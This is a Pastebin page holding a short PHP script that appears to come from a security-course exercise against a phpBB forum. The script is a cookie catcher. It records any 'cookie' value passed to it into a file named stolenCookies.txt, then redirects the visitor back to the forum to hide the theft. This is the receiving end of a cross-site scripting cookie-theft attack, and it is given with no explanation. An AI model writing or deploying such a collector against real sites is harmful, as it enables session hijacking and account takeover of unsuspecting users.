Advertisement
Guest User

Untitled

a guest
Apr 25th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.29 KB | None | 0 0
  1. <?php
  2.  
  3. if (isset($_GET['cookie']))
  4. {
  5.     $file = 'stolenCookies.txt';
  6.     file_put_contents($file, $_GET['cookie'].PHP_EOL, FILE_APPEND);
  7. }
  8.  
  9.  
  10. ?>
  11.  
  12. <html><body>
  13. <script>
  14.     window.location="http://oifakeskanounkalo.csec.chatzi.org/modules/phpbb/viewforum.php?forum=1";
  15. </script>
  16. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement